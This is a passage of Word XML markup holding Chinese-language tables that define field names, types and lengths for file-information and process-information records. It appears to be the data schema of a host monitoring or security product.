        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="00AD861F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B909E00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="460A17AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C3B3219" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55FDB249" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="77D0AD37" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BFF0072" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20C0DD33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21F2ACF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E1F068" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3D8881FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B922113" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="500BA6C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A08ED36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73812C2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="512EE32D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38EF4689" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E71D321" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FBD7F43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23C82B39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55142608" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECE1B67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13FE0108" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="127A55BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A381896" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60BE5B7D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0103DE59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C759CDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="170F2A98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BE1CE91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0040FE74" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01C8C599" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>changeTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E512360" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59C6D478" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BD1F216" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件change time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5120D1E9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="586E4E0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modifyTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AB5457B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3737521B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6055A827" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件change time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="280DDFE2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7321A724" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accessTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D160590" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00E05E53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A8F571E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D00DC3A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3752B911" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B92A474" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43BBE9D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B06553E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36299C57" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="050D7976" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F955EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2861FF19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52843D1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0E54A4C4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="755F736B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69DBCA74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FF2A446" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A94ECFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="793C5588" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6041BA89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>codeSectionMd5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="549DF09C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A247E84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="751672BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="34F101D3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AAA4E4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>codeSectionSha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="128A983F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69FF6C2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06E5B22C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4ACEFACF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CDFCC34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>codeSectionSha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50A9A47B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1717E85D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B39FDEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0178BA42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>进程信息数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2143"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2185"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="234346E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F8E2E67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C96D047" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20C1153D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A589470" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="203CB978" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6704114A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22182A03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14107EAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57D84E32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="101DC49E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54A3FA3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C431EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EBC58A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AA17BF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程对应执行文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
